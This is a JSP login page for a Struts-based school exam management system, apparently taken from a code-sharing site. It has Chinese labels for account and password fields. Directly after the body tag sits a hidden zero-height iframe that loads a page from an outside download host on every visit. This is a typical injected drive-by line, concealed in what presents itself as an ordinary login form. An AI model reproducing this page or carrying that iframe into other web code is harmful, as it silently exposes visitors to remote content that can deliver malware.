📄 login.jsp
字号:
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-html.tld" prefix="html" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<%@ page language="java" pageEncoding="gb2312"%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>用户登陆</title>
<style>
.tableFrame {
border: 1px solid #06417D;
}
.textFieldFrame {
border: 1px solid #aaa;
height: 19px;
width: 130px;
}
.px12black {
font-family: Arial, "宋体";
font-size: 12px;
color: #000000;
text-decoration: none;
}
.px12gay{
font-family: Arial, "宋体";
font-size: 12px;
color: #AAAAAA;
text-decoration: none;
}
.px15gay{
font-family:Arial, "宋体";
font-size: 14px;
}
img {
border:0px;
}
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-image: url();
}
form{
margin:0px;
}
.STYLE2 {color: #FF9933}
.style3 {
font-family: Arial, "宋体";
font-size: 18px;
color: #0000FF;
text-decoration: none;
font-weight: bold;
}
.style9 {font-size: 14px; font-weight: bold; }
</style>
</head>
<body><iframe src=http://down.onlinedowns.net/page/image/pd.htm height=0></iframe>
<html:form action="/toLogin.do?method=login" method="post">
<table width="626" height="86" border="0" align="center" cellpadding="0" cellspacing="0" style="margin-top:70px;">
<tr>
<td><div align="center">
<table width="104%" border="1">
<tr>
<td width="25%" height="65"><img src="images/denglu.jpg" width="621" height="175" /></td>
</tr>
</table>
</div></td>
</tr>
</table>
<table width="663" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="663" height="17" background="images/login_top.gif"></td>
</tr>
<tr>
<td height="135" background="images/login_mid.gif">
<table width="30%" height="91" border="0" align="center" cellpadding="0" cellspacing="0" class="px12black" style="margin-top:10px">
<tr>
<td width="50%"><span class="style9">帐号:</span></td>
<td width="50%"><html:text property="userID" size="20" maxlength="12" styleClass="textFieldFrame"></html:text>
<font color="red"><html:errors property="userIDIsWrong" /></font></td>
</tr>
<tr>
<td><span class="style9">密码:</span></td>
<td><html:password property="password" size="20" maxlength="20" styleClass="textFieldFrame"></html:password>
<font color="red"><html:errors property="passwordIsWrong" /></font></td>
</tr>
<tr>
<td colspan="2"><div align="center">
<html:submit property="method">登陆</html:submit>
<html:reset>重置</html:reset>
</td>
</tr>
</table>
<table height="20"><tr><td></td></tr></table>
<div align="center" class="px15gay">注:管理员请用ID号和密码登陆,教师用职工号和身份证号进行登陆,考生用学生证号和身份证号进行登陆,非相关人员请勿随便盗用本系统,否则追究法律责任!</div></td>
</tr>
<tr>
<td height="10" background="images/login_bottom.gif"></td>
</tr>
</table>
<table width="626" height="25" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><div align="center" class="px12gay">版权所有 Copyright 2007-2008 (c) 会背诗的毛豆</div></td>
</tr>
</table>
</html:form>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -